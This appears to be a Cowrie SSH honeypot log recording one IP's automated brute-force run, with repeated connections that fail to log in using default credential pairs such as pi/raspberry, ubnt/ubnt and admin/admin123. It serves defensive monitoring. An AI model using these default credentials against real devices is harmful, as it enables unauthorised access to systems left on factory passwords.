{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:28:10.045551Z","src_ip":"212.227.235.229","session":"edd3bb986918"}
{"eventid":"cowrie.login.failed","username":"admin","password":"111111","message":"login attempt [admin/111111] failed","sensor":"my-vps","timestamp":"2025-08-26T08:28:12.592716Z","src_ip":"212.227.235.229","session":"edd3bb986918"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:28:14.059795Z","src_ip":"212.227.235.229","session":"edd3bb986918"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36954,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f797058e2cc","protocol":"ssh","message":"New connection: 212.227.235.229:36954 (1.2.3.4:22) [session: 7f797058e2cc]","sensor":"my-vps","timestamp":"2025-08-26T08:28:14.208817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:28:14.794035Z","src_ip":"212.227.235.229","session":"7f797058e2cc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:28:14.794785Z","src_ip":"212.227.235.229","session":"7f797058e2cc"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password1","message":"login attempt [admin/password1] failed","sensor":"my-vps","timestamp":"2025-08-26T08:28:16.723907Z","src_ip":"212.227.235.229","session":"7f797058e2cc"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:28:18.088387Z","src_ip":"212.227.235.229","session":"7f797058e2cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51304,"dst_ip":"1.2.3.4","dst_port":22,"session":"deecbe2f04f8","protocol":"ssh","message":"New connection: 212.227.235.229:51304 (1.2.3.4:22) [session: deecbe2f04f8]","sensor":"my-vps","timestamp":"2025-08-26T08:28:18.187947Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:28:18.621077Z","src_ip":"212.227.235.229","session":"deecbe2f04f8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:28:18.621818Z","src_ip":"212.227.235.229","session":"deecbe2f04f8"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T08:28:20.380798Z","src_ip":"212.227.235.229","session":"deecbe2f04f8"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:28:21.872189Z","src_ip":"212.227.235.229","session":"deecbe2f04f8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39864,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3f9ada9b199","protocol":"ssh","message":"New connection: 212.227.235.229:39864 (1.2.3.4:22) [session: a3f9ada9b199]","sensor":"my-vps","timestamp":"2025-08-26T08:28:21.977207Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:28:22.185730Z","src_ip":"212.227.235.229","session":"a3f9ada9b199"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:28:22.186433Z","src_ip":"212.227.235.229","session":"a3f9ada9b199"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-26T08:28:23.639469Z","src_ip":"212.227.235.229","session":"a3f9ada9b199"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:28:25.228179Z","src_ip":"212.227.235.229","session":"a3f9ada9b199"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54634,"dst_ip":"1.2.3.4","dst_port":22,"session":"872bda64e32a","protocol":"ssh","message":"New connection: 212.227.235.229:54634 (1.2.3.4:22) [session: 872bda64e32a]","sensor":"my-vps","timestamp":"2025-08-26T08:28:25.347918Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:28:25.827067Z","src_ip":"212.227.235.229","session":"872bda64e32a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:28:25.827932Z","src_ip":"212.227.235.229","session":"872bda64e32a"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-08-26T08:28:28.648202Z","src_ip":"212.227.235.229","session":"872bda64e32a"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:28:30.054982Z","src_ip":"212.227.235.229","session":"872bda64e32a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43980,"dst_ip":"1.2.3.4","dst_port":22,"session":"50c6a194328c","protocol":"ssh","message":"New connection: 212.227.235.229:43980 (1.2.3.4:22) [session: 50c6a194328c]","sensor":"my-vps","timestamp":"2025-08-26T08:28:30.181965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:28:30.616717Z","src_ip":"212.227.235.229","session":"50c6a194328c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:28:31.016946Z","src_ip":"212.227.235.229","session":"50c6a194328c"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T08:28:32.307718Z","src_ip":"212.227.235.229","session":"50c6a194328c"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:28:33.771341Z","src_ip":"212.227.235.229","session":"50c6a194328c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60594,"dst_ip":"1.2.3.4","dst_port":22,"session":"73aee6645a00","protocol":"ssh","message":"New connection: 212.227.235.229:60594 (1.2.3.4:22) [session: 73aee6645a00]","sensor":"my-vps","timestamp":"2025-08-26T08:28:33.889463Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:28:34.381056Z","src_ip":"212.227.235.229","session":"73aee6645a00"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:28:34.381889Z","src_ip":"212.227.235.229","session":"73aee6645a00"}
{"eventid":"cowrie.login.failed","username":"dahua","password":"dahua","message":"login attempt [dahua/dahua] failed","sensor":"my-vps","timestamp":"2025-08-26T08:28:36.597153Z","src_ip":"212.227.235.229","session":"73aee6645a00"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:28:38.264613Z","src_ip":"212.227.235.229","session":"73aee6645a00"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50282,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd8bafe8e546","protocol":"ssh","message":"New connection: 212.227.235.229:50282 (1.2.3.4:22) [session: dd8bafe8e546]","sensor":"my-vps","timestamp":"2025-08-26T08:28:38.363596Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:28:38.912929Z","src_ip":"212.227.235.229","session":"dd8bafe8e546"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:28:38.913643Z","src_ip":"212.227.235.229","session":"dd8bafe8e546"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"123456","message":"login attempt [administrator/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T08:28:41.339245Z","src_ip":"212.227.235.229","session":"dd8bafe8e546"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:28:45.109076Z","src_ip":"212.227.235.229","session":"dd8bafe8e546"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48630,"dst_ip":"1.2.3.4","dst_port":22,"session":"ddf392613993","protocol":"ssh","message":"New connection: 212.227.235.229:48630 (1.2.3.4:22) [session: ddf392613993]","sensor":"my-vps","timestamp":"2025-08-26T08:28:45.202761Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:28:45.521305Z","src_ip":"212.227.235.229","session":"ddf392613993"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:28:45.522398Z","src_ip":"212.227.235.229","session":"ddf392613993"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"admin","message":"login attempt [administrator/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T08:28:47.405186Z","src_ip":"212.227.235.229","session":"ddf392613993"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:28:48.937288Z","src_ip":"212.227.235.229","session":"ddf392613993"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35944,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3692692b45a","protocol":"ssh","message":"New connection: 212.227.235.229:35944 (1.2.3.4:22) [session: a3692692b45a]","sensor":"my-vps","timestamp":"2025-08-26T08:28:49.079574Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:28:49.492790Z","src_ip":"212.227.235.229","session":"a3692692b45a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:28:49.493497Z","src_ip":"212.227.235.229","session":"a3692692b45a"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo","message":"login attempt [demo/demo] failed","sensor":"my-vps","timestamp":"2025-08-26T08:28:51.352562Z","src_ip":"212.227.235.229","session":"a3692692b45a"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:28:52.916800Z","src_ip":"212.227.235.229","session":"a3692692b45a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50988,"dst_ip":"1.2.3.4","dst_port":22,"session":"00e203a43913","protocol":"ssh","message":"New connection: 212.227.235.229:50988 (1.2.3.4:22) [session: 00e203a43913]","sensor":"my-vps","timestamp":"2025-08-26T08:28:53.038608Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:28:53.382872Z","src_ip":"212.227.235.229","session":"00e203a43913"}
